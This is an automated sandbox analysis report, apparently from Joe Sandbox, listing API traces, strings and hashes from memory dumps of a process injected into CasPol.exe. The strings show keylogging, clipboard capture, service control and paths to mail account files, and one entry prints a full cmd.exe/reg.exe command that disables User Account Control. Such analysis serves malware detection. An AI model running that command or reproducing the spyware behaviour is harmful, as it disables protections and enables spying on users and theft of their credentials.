                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                  • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                  • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                  • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                  • _free.LIBCMT ref: 00446F06
                                                                                                                  • _free.LIBCMT ref: 00446F2E
                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                  • _abort.LIBCMT ref: 00446F4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3160817290-0
                                                                                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                  • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                  • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3160817290-0
                                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 221034970-0
                                                                                                                  • Opcode ID: facabc629ece00eb5c6b8119d2553d40166156de758601b1177479ca1c3dec6c
                                                                                                                  • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                  • Opcode Fuzzy Hash: facabc629ece00eb5c6b8119d2553d40166156de758601b1177479ca1c3dec6c
                                                                                                                  • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 221034970-0
                                                                                                                  • Opcode ID: 48f7f48bbaef7dc56ded15f7c4ab138f238c70d6356feb2091f1178006fb1abd
                                                                                                                  • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                  • Opcode Fuzzy Hash: 48f7f48bbaef7dc56ded15f7c4ab138f238c70d6356feb2091f1178006fb1abd
                                                                                                                  • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 221034970-0
                                                                                                                  • Opcode ID: 9d56ba1c0ab4f3c7c35dd1a36e14f7b770e45bff24f4a3e5cfd9a6ef981b4461
                                                                                                                  • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                  • Opcode Fuzzy Hash: 9d56ba1c0ab4f3c7c35dd1a36e14f7b770e45bff24f4a3e5cfd9a6ef981b4461
                                                                                                                  • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                  APIs
                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                                  • String ID: [regsplt]$DG
                                                                                                                  • API String ID: 3554306468-1089238109
                                                                                                                  • Opcode ID: 23ecd6cd4b210895098c6e82fed9f94bfa90ac4909f2c75c9ab06080acf4478e
                                                                                                                  • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                  • Opcode Fuzzy Hash: 23ecd6cd4b210895098c6e82fed9f94bfa90ac4909f2c75c9ab06080acf4478e
                                                                                                                  • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID: wKE
                                                                                                                  • API String ID: 269201875-3150218262
                                                                                                                  • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                  • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                  • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                  • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 2652629310-661517699
                                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                    • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                    • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                    • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                    • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                  • API String ID: 2974294136-4018440003
                                                                                                                  • Opcode ID: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
                                                                                                                  • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                  • Opcode Fuzzy Hash: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
                                                                                                                  • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                  • wsprintfW.USER32 ref: 0040A905
                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                  • API String ID: 1497725170-248792730
                                                                                                                  • Opcode ID: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
                                                                                                                  • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                  • Opcode Fuzzy Hash: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
                                                                                                                  • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                  • String ID: `AG
                                                                                                                  • API String ID: 1958988193-3058481221
                                                                                                                  • Opcode ID: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
                                                                                                                  • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                  • Opcode Fuzzy Hash: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
                                                                                                                  • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                  APIs
                                                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                  • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                                  • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                  • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                  • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                  • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                  Strings
                                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                                  • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                  • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                  • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                  • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
